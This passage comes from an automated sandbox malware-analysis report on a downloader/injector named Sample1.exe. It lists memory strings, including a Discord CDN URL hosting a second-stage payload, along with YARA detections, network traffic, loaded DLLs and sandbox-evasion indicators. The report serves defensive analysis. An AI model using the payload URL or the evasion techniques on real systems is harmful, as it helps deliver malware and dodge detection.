00000000.00000002.3799428208.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: Sample1.exe, 00000000.00000002.3802047598.000000001B4A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Sample1.exe, 00000000.00000002.3799428208.00000000023E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Sample1.exe, 00000000.00000002.3799428208.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002585000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.000000000242E000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002490000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002799000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000023E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: Sample1.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe
Source: Sample1.exe, 00000000.00000002.3799428208.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002585000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002490000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, Sample1.exe, 00000000.00000002.3799428208.0000000002799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.comxz

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown

HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.25:49722 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Sample1.exe, type: SAMPLE

Matched rule: Detects downloader / injector Author: ditekSHen

Source: C:\Users\user\Desktop\Sample1.exe

Process Stats: CPU usage > 49%

Source: Sample1.exe, 00000000.00000000.1337583358.0000000000012000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamepctool.exe4 vs Sample1.exe
Source: Sample1.exe	Binary or memory string: OriginalFilenamepctool.exe4 vs Sample1.exe

Source: Sample1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Sample1.exe, type: SAMPLE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: classification engine

Classification label: mal84.troj.evad.winEXE@2/0@3/3

Source: C:\Users\user\Desktop\Sample1.exe

Mutant created: NULL

Source: Sample1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Sample1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Sample1.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Sample1.exe	Virustotal: Detection: 83%
Source: Sample1.exe	ReversingLabs: Detection: 81%

Source: unknown	Process created: C:\Users\user\Desktop\Sample1.exe "C:\Users\user\Desktop\Sample1.exe"
Source: unknown	Process created: C:\Windows\System32\SystemSettingsBroker.exe C:\Windows\System32\SystemSettingsBroker.exe -Embedding

Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: vcruntime140_1_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: systemsettings.datamodel.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: settingshandlers_display.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: cfgmgr32.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: deviceassociation.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: settingshandlers_accessibility.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: settingshandlers_sharedexperiences_rome.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: settingshandlers_devices.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: wincorlib.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.internal.accessibility.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.internal.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: audiohandlers.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.cloudstore.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: uvcmodel.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.devices.radios.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: appextension.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.media.devices.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: languageoverlayutil.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: deviceflows.datamodel.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: threadpoolwinrt.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: devdispitemprovider.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: devicedisplaystatusmanager.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: fundisc.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: fddevquery.dll	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Section loaded: windows.graphics.dll	Jump to behavior

Source: C:\Windows\System32\SystemSettingsBroker.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B488CB7E-98BC-4FA9-9FCA-E461728EFDCE}\InProcServer32

Jump to behavior

Source: Sample1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Sample1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SystemSettingsBroker.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Sample1.exe

Binary or memory string: SBIEDLL.DLL7

Source: C:\Users\user\Desktop\Sample1.exe	Memory allocated: 22A0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Memory allocated: 1A360000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599222	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598127	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 598001	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596888	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596538	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596435	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595255	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Sample1.exe	Thread delayed: delay time: 594468	Jump to behavior
